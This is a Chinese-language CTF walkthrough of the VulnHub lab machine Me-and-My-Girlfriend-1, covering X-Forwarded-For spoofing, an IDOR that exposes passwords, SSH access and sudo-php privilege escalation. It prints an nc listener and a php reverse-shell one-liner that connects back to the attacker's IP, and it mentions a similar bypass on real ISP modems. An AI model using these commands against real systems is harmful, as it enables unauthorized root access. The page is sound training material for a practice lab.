专栏首页鸿鹄实验室vulnhub之Me-and-My-Girlfriend-1实战

vulnhub之Me-and-My-Girlfriend-1实战

运行说明

靶机名称:Me-and-My-Girlfriend-1

靶机难度:初学者/中级

目标:有两个flag,一个user-flag,一个root-flag

攻击机:kali linux,IP地址192.168.153.139

靶机:Me-and-My-Girlfriend-1,IP地址192.168.153.147

渗透过程

1. 主机发现,对比开关主机前后发现目标主机

2. 扫描开放端口等信息

3.存在80端口,查看网页

提示信息的意思是,把x-forwarded-for这个参数值改为本地值

I.使用burpsuite来修改

在bp的代理页中,添加一项本地参数并勾选,这样每次发包经过bp就会添加一个本地参数

II. 使用chrom插件X-Forwarded-For Header

4.进入主网页,可以看到网站给出了Home Login Register About四个按钮

Home为主页按钮

Login为登录按钮,弱口令尝试登陆无效

Register为注册按钮,我们注册一个账号

发现url参数中可以看到用户id,这里尝试修改user_id值,是否存在水平越权

纯在水平越权,并且修改前端type为test即可查看密码。联通光猫的管理界面也是纯在这个彩蛋的,并且超级管理员密码可以绕过查看。

根据提示我们需要寻找一个叫alice的账号,id需改为5时alice账户。

5. Nmap扫描时发现可以ssh远程连接,连接查看

查看信息

发现第一个flag

6. 提权

查看alice的权限

Alice可在主机中所使用root权限

Web服务器为Apache,所以我们进入目录下查看信息

7. 发现了一些美妙的东西,看了别人的步骤才知道,我没有进行目录扫描,之前没有发现这些目录和信息,不过小小不言。

进入config目录

查看,发现更美妙的东西

尝试连接sql数据库查看信息

额 没什么用

利用nc反弹shell

在kali开启nc反弹端口 nc -lvp 7777

然后靶机上的alice创建一个php反弹shell去连接它:

sudo/usr/bin/php-r '$sock=fsockopen("192.168.153.139",7777);exec("/bin/bash -i <&3 >&3 2>&3");'

返回kali这边已经登录进root了

8. Nc反弹shell的几种常用方式

https://www.cnblogs.com/-chenxs/p/11748488.html

9. 其实mysql密码就是root的登录密码233333

本文分享自微信公众号 - 鸿鹄实验室(gh_a2210090ba3f),作者:鸿鹄实验室a

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2020-01-31

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 【Vulnhub】Me-and-My-Girlfriend-1

    登录页面和个人页面 sqlmap 跑了一下没跑出啥东西来,在 profile这里有个 id,改了之后能显示别人的信息

    yichen
  • 利用kage把msf变成可视化远控平台

    鸿鹄实验室
  • CTF-我和我的女朋友 Me and My Girlfriend 1—Writeup

    题目来自:https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/

    CatGames
  • [JavaScript进阶]从JavaScript原型到面向对象

    首先给出结论,JavaScript 的本身是支持面向对象的,它本身具备着强大灵活的 OOP 语言能力。但是对于使用过基于类的语言 (如 Java 或 C++) ...

    用户1462769
  • WEB-异或注入学习

    ​ 我们高中的时候学习的数学逻辑。异或就是一种逻辑运算,运算法则概括起来说就是:两个条件相同(同真或同假)即为假(0),两个条件不同即为真(1),...

    ly0n
  • 第十七天-面向对象03-类与类的关系

    # 所以想要谁不可哈希 可添加 __hash__ = None # 如上面类中添加 __hash__ = None 该类的对象就不可哈希了

    py3study
  • 数据是美丽的

    Reddit 是美国的一个综合性论坛网站,网友戏称“美国贴吧”。我最近发现,这真是个宝藏网站。

    Crossin先生
  • 英语语法记录 - 未完善

    1.主语: 句子所陈述的对象。 2.谓语: 主语发出的动作。一般是有动作意义的动词。 3.宾语: 分为动词宾语和介词宾语,属于动作的承受者。 4.系动词:...

    日记猫
  • SAS统计一篇文章中各字母的出现频率

    今天偶然看到一个古老的帖子:统计一篇文章中各字母的出现的次数和频率。先说统计单词的问题。最直接的方法应该是将文章按单词分成多行,每行一个单词,再用PROC FR...

    专业余码农
  • git 回滚错误的push

    有时候,工作时会错误地对一些修改进行commit并push到远程,这时候想回滚这部分commit,并且远程分支也同步回滚

    zero000
  • Redis 生涯就此结束

    最近 Redis 之父 antirez 退休了,以下是他的临别赠言,我抽空翻译了一下,原文在某些地方语言组织的比较晦涩,翻译的可能不是很到位。

    老钱
  • Q3-Q4 LFX计划:14名CNCF实习生毕业!

    在最新一轮由 CNCF 资助的LFX 导师计划[1]中,有 14 名实习生成功通过了该计划!本季度有 11 个 CNCF 毕业、孵化和沙箱项目参与,包括 Cha...

    CNCF
  • 人工智能:科学与星球大战

    人工智能:科学与星球大战 ? On this week episode is science and star wars, artificial intelli...

    企鹅号小编
  • 张亚勤寄语哥伦比亚大学2020年毕业生:引领未知时代

    5月18日,人工智能和数字视频的世界级科学家和企业家,美国艺术与科学院院士、百度前总裁、清华大学智能科学讲席教授张亚勤博士,在哥伦比亚大学工学院的毕业典礼上发表...

    数据猿
  • 乔布斯斯坦福毕业演讲,这是我听过最精彩的毕业演讲!

    2005年6月14号乔布斯在斯坦福大学的毕业典礼上做的一次精彩的演讲。被很多人称为是听过的最好的毕业演讲,而且每一次听都有新的收获。

    一个会写诗的程序员
  • 17:文字排版

    17:文字排版 查看 提交 统计 提问 总时间限制: 1000ms 内存限制: 65536kB描述 给一段英文短文,单词之间以空格分隔(每个单词包括其前后紧邻...

    attack
  • 微软 Surface DUO:重新思考智能手机

    https://www.technewsworld.com/story/86843.html

    zstt8054929
  • TW洞见 | 用TDD影响设计

    在听过Martin Fowler、Kent Beck和DHH关于TDD的讨论以后,我想也把我关于TDD的想法记录下来——我为什么要遵从它,以及为什么我会发现它做...

    ThoughtWorks
  • Python3 面向对象概述

    Python从设计之初就已经是一门面向对象的语言,所以我们可以以面向对象的方式去编写python代码。面向对象就是将任何事情都当做对象去看待,一个对象会拥有属性...

    py3study

扫码关注云+社区

领取腾讯云代金券